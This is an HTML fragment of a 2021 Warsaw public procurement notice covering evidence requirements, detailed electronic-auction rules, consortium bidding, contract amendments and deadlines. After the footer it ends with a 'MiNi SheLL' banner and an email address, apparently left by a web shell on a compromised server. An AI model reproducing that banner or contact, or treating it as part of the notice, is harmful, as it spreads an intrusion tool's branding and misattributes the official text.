class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w Oświadczeniu z art. 125 ust. 1 ustawy<br/>PZP w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją<br/>o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://aukcje.um.warszawa.pl</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> Zamawiający przewiduje dokonanie wyboru najkorzystniejszej oferty z zastosowaniem aukcji<br/>elektronicznej. Zgodnie z art. 227 ustawy PZP Zamawiający po dokonaniu oceny ofert w celu<br/>wyboru najkorzystniejszej oferty przeprowadzi aukcję elektroniczną, jeżeli złożono co najmniej 2<br/>oferty niepodlegające odrzuceniu.2. Adres strony internetowej, na której zostanie przeprowadzona<br/>aukcja elektroniczna: https://aukcje.um.warszawa.pl/3. Wykonawca w ofercie wskaże osobę<br/>uprawnioną do składania ofert w trakcie aukcji elektronicznej w imieniu Wykonawcy. W przypadku,<br/>gdy będzie to inna osoba niż podpisująca ofertę, należy załączyć do oferty pełnomocnictwo<br/>(oryginał lub kopię poświadczoną za zgodność z oryginałem przez notariusza) podpisane przez<br/>osobę/-y uprawnioną/-e do reprezentacji Wykonawcy, z którego wynikać będzie prawo do<br/>reprezentowania Wykonawcy w aukcji elektronicznej, jeżeli umocowanie nie wynika z przepisów<br/>prawa lub innych dokumentów.4. Warunkiem wzięcia udziału w aukcji elektronicznej jest<br/>dysponowanie kwalifikowanym podpisem elektronicznym przez osobę składającą postąpienia w<br/>aukcji w imieniu Wykonawcy5. Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać<br/>komputer Wykonawcy:1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s na komputer;2) komputer PC/MAC z aktualnym systemem operacyjnym<br/>wspieranym przez producenta.6. W czasie trwania aukcji Wykonawcy składają swoje oferty w<br/>postaci elektronicznej. Postąpienie pod rygorem nieważności składa się opatrzone bezpiecznym<br/>podpisem elektronicznym weryfikowanym za pomocą kwalifikowanego certyfikatu, ważnego na<br/>czas przeprowadzenia aukcji. Wykonawca może złożyć dowolną liczbę postąpień.7. Wymagania<br/>sprzętowo-aplikacyjne w zakresie podpisywania postąpień:1) włączona w przeglądarce obsługa<br/>JavaScript;2) zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla<br/>systemu Windows - w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java<br/>SE Runtime Environment 8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do<br/>pobrania ze strony producenta w sekcji Java SE Development Kit 8u202 - Mac OS X x64;<br/>alternatywnie do oprogramowania ORACLE - JAVA w wersji OpenJDK)3) zainstalowana aplikacja<br/>Szafir Host;4) podłączony lub wbudowany w komputer czytnik kart podpisu<br/>elektronicznego.Prawidłowość zainstalowania w/w komponentów można zweryfikować po<br/>zalogowaniu do OnePlace, po kliknięciu przycisku „SPRAWDŹ PODPIS”.8. Sposób rejestracji<br/>Wykonawcy zaproszonego do udziału w aukcji w Systemie:1) Wykonawca zaproszony do udziału w<br/>aukcji elektronicznej, który nie składał wcześniej oferty w postępowaniu prowadzonym drogą<br/>elektroniczną w Systemie, zostanie wstępnie zarejestrowany w bazie wykonawców OnePlace<br/>przez Przedstawiciela Operatora Systemu i otrzyma prośbę o dokończenie procesu rejestracji,<br/>skierowaną na adres e-mail osoby upoważnionej do składania ofert w toku aukcji, podany<br/>wcześniej w ofercie. Aby zakończyć proces rejestracji Wykonawca uzupełnia pozostałe dane<br/>użytkownika i dane firmy, którą reprezentuje.2) W przypadku gdy Wykonawca jest zarejestrowany<br/>na platformie OnePlace, ale nie ma zarejestrowanych danych użytkownika Wykonawcy<br/>upoważnionego do składania ofert w toku aukcji, na podany adres e-mail System wyśle zaproszenie do udziału w aukcji. Osoba otrzymująca zaproszenie rejestruje swoje konto na<br/>OnePlace, które zostaje powiązane z już istniejącym Wykonawcą, poprzez wskazanie danych firmy<br/>Wykonawcy.3) W pozostałych przypadkach Wykonawca używa do udziału w aukcji konta<br/>Wykonawcy zarejestrowanego wcześniej w OnePlace, na które loguje się do systemu z użyciem<br/>ustanowionego przez siebie hasła.9. Zamawiający zaprosi drogą elektroniczną do udziału w aukcji<br/>elektronicznej wszystkich Wykonawców, którzy złożyli oferty niepodlegające odrzuceniu. W<br/>zaproszeniu do udziału w aukcji elektronicznej Zamawiający poinformuje Wykonawców o:1) wyniku<br/>badania i oceny oferty tego Wykonawcy,2) minimalnych wartości postąpień składanych w toku<br/>aukcji elektronicznej,3) terminie otwarcia aukcji elektronicznej,4) terminie i warunkach zamknięcia<br/>aukcji elektronicznej,5) sposobie oceny ofert w toku aukcji elektronicznej,6) formule matematycznej,<br/>która zostanie wykorzystana w aukcji elektronicznej do automatycznego tworzenia kolejnych<br/>klasyfikacji na podstawie przedstawianych nowych cen lub wartości.10. Zamawiający informuje, że<br/>parametrem licytowanym w aukcji elektronicznej będzie łączna cena brutto. Wartością wyjściową w<br/>aukcji elektronicznej dla każdego Wykonawcy jest cena brutto za realizację zamówienia<br/>zaproponowana przez danego Wykonawcę w złożonej ofercie. Minimalne wartości postąpień, które<br/>wymagane będą podczas licytacji: 4 500 zł (brutto).11. Parametr okres gwarancji jakości i rękojmi za wady jest wartością<br/>stałą i nie podlega zmianie w toku aukcji elektronicznej. Punkty przyznane ofercie za ten parametr<br/>na etapie oceny ofert będą automatycznie dodawane do punktów przyznawanych parametrom<br/>licytowanym w toku aukcji elektronicznej.12. Oferty składne przez Wykonawców podlegają<br/>automatycznej klasyfikacji na podstawie kryteriów oceny ofert. Aukcja elektroniczna będzie<br/>odbywać się według modelu aukcji dynamicznej, co oznacza, że Wykonawca samodzielnie wpisuje<br/>swoje oferty w przeznaczone do tego celu okno lub zmienia je o postąpienie za pomocą przycisku<br/>,,-‘’. Składana oferta musi być niższa od poprzedniej oferty o krok postąpienia lub więcej.<br/>Wykonawca nie będzie miał możliwości podwyższenia uprzednio zaproponowanej przez siebie<br/>ceny ofertowej.13. Oferta Wykonawcy przestaje wiązać w zakresie w jakim złożył on korzystniejszą<br/>ofertę w toku aukcji elektronicznej. Bieg terminu związania oferta nie ulega zmianie.14. W trakcie<br/>aukcji elektronicznej System na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji<br/>złożonych przez nich ofert i otrzymanej punktacji oraz punktacji najkorzystniejszej oferty. Do<br/>momentu zamknięcia aukcji elektronicznej system nie ujawnia informacji umożliwiających<br/>identyfikację Wykonawców.15. Od momentu otwarcia do momentu zamknięcia aukcji elektronicznej<br/>wszystkie wnioski, oświadczenia i informacje Zamawiający i Wykonawca będą sobie przekazywać<br/>drogą elektroniczną.16. Dodatkowe informacje dla Wykonawców, dotyczące aukcji elektronicznej:1)<br/>Aukcja jest jednoetapowa.2) Podstawowy czas trwania aukcji elektronicznej wynosić będzie: 15<br/>minut.3) Zamknięcie aukcji elektronicznej nastąpi wraz z upływem podstawowego czasu trwania<br/>aukcji elektronicznej - pod warunkiem, że w ciągu ostatnich 3 minut trwania aukcji nie zostanie<br/>zgłoszone nowe postąpienie.4) Jeżeli w ciągu ostatnich 3 minut czasu trwania aukcji elektronicznej<br/>zostanie złożona nowa oferta (zgłoszone nowe postąpienie) aukcja zostanie automatycznie<br/>przedłużona - o 3 minuty plus liczba sekund dopełniająca rozpoczętą minutę od chwili złożenia<br/>nowej oferty, o ile nie zostanie zgłoszone nowe postąpienie.5) Cena ofertowa powinna obejmować<br/>wszystkie koszty i wydatki niezbędne do należytego wykonania przedmiotu zamówienia, zgodnie z<br/>warunkami określonymi w SWZ.6) W przypadku, gdy w momencie zamknięcia aukcji dwie lub<br/>większa liczba ofert uzyskuje jednakową i jednocześnie najwyższą liczbę punktów, Zamawiający<br/>uznaje za najkorzystniejszą ofertę, ofertę z najniższą ceną za wykonanie zamówienia, która zostaje<br/>złożona jako pierwsza w toku aukcji.7) Jeśli Zamawiający nie przeprowadzi aukcji lub w jej trakcie<br/>nie zostanie złożone żadne postąpienie, wiążąca jest pierwotna ocena ofert.17. W przypadku, gdy<br/>awaria Systemu Zakupowego Miasta Stołecznego Warszawy spowoduje przerwanie aukcji<br/>elektronicznej, Zamawiający wyznacza termin kontynuowania aukcji elektronicznej na następny po<br/>usunięciu awarii dzień roboczy, z uwzględnieniem stanu ofert po ostatnim zatwierdzonym<br/>postąpieniu. Niezwłocznie po usunięciu awarii Zamawiający informuje o terminie wznowienia aukcji<br/>wszystkich Wykonawców zaproszonych do udziału w aukcji na adres e-mail podany w ofercie.18.<br/>Zamawiający po zamknięciu aukcji elektronicznej dokonuje oceny ofert w oparciu o kryteria oceny<br/>ofert wskazane w Ogłoszeniu o zamówieniu i w SWZ, z uwzględnieniem wyników aukcji<br/>elektronicznej.19. Szczegółowe informacje dotyczące sposobu logowania, prowadzenia aukcji<br/>elektronicznej i wymagań technicznych urządzeń informatycznych zostały opisane w Instrukcjach<br/>dla Wykonawcy dostępnych na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i procedury procesu zakupowego” pod adresem:<br/>https://zamowienia.um.warszawa.pl/servlet/HomeServlet?<br/>MP_module=main&MP_action=publicFilesList& =umw&USER_MENU_HOVER=publicFilesList<br/>Przed przystąpieniem do aukcji Wykonawca zobowiązany jest dokładnie zapoznać się z ich treścią. <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia:1) ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego;2) ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy i wniesienie zabezpieczenia należytego wykonania umowy.3. Jeżeli zostanie wybrana<br/>oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę<br/>tych Wykonawców.4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi,<br/>do realizacji których te zdolności są wymagane.5. W przypadku, o którym mowa w ust. 4 ,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie<br/>(Oświadczenie Konsorcjantów), z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy.6. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, Oświadczenia z art. 125 ust. 1 ustawy PZP składany jest przez każdego z<br/>Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem ust. 2.<br/>2.	Zamawiający przewiduje zmiany zawartej umowy dotyczące:<br/>1) terminu realizacji zamówienia w przypadku zaistnienia jednej z następujących okoliczności:<br/>a)	wystąpienia warunków pogodowych uniemożliwiających, ze względów technologicznych prowadzenie prac, pomimo dołożenia przez Wykonawcę wszelkich starań aby roboty mogły zostać zrealizowane, z zastrzeżeniem, iż okres wydłużenia terminu realizacji nie może być dłuższy niż okres trwania wyżej wymienionych warunków pogodowych powodujących brak możliwości prowadzenia prac,<br/>b)	wstrzymania prac lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,<br/>c)	działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,<br/>d)	zmiany na wniosek Zamawiającego dokumentacji, o której mowa w Etapie I opisu przedmiotu zamówienia stanowiącym załącznik do umowy,<br/>e)	w razie zaistnienia zdarzeń niezależnych od Stron, po dacie zawarcia umowy, a których strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w sposób należyty,<br/>f)	gdy wydanie niezbędnych do wykonania dokumentacji, np.: map, decyzji, opinii lub uzgodnień<br/>z jednostkami zewnętrznymi, nastąpi w terminie dłuższym niż przewidziany w KPA (licząc od daty prawidłowo złożonego wniosku), uwzględniając, że wydłużenie terminu nastąpiło z przyczyn niezależnych od Wykonawcy,<br/>g)	działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są <br/>konsekwencją winy którejkolwiek ze stron.<br/><br/>2)	w przypadku wystąpienia okoliczności niezależnych od Stron zaistniałych po dacie zawarcia umowy,<br/>3)	podwykonawców w przypadku zaistnienia jednej z następujących okoliczności:<br/><br/>a)	zmiana podwykonawcy - musi być zaakceptowana przez Zamawiającego,<br/>b)	zmiana zakresu powierzonych prac.<br/><br/>3.	Przesunięcie terminu wykonania przedmiotu umowy z przyczyn, o których mowa w ust. 2 pkt 1 i 2, jest możliwe jedynie po potwierdzeniu ich wystąpienia przez przedstawiciela Zamawiającego.<br/>4.	Wykonawca składa Zamawiającemu pismo z prośbą o przesunięcie terminu wykonania przedmiotu umowy wraz z uzasadnieniem, nie później niż 7 dni przed upływem terminu określonego w § 2 ust. 1.<br/>5.	Wprowadzenie zmian do zawartej umowy określonych w ust. 2 pkt 1 - 3, wymaga sporządzenia przez Zamawiającego uzasadnienia określającego przyczyny zmiany. Uzasadnienie będzie załącznikiem do aneksu zmieniającego niniejszą umowę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Systemu Zakupowego Miasta Stołecznego Warszawy dostępnego pod adresem: https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-11 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-10</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com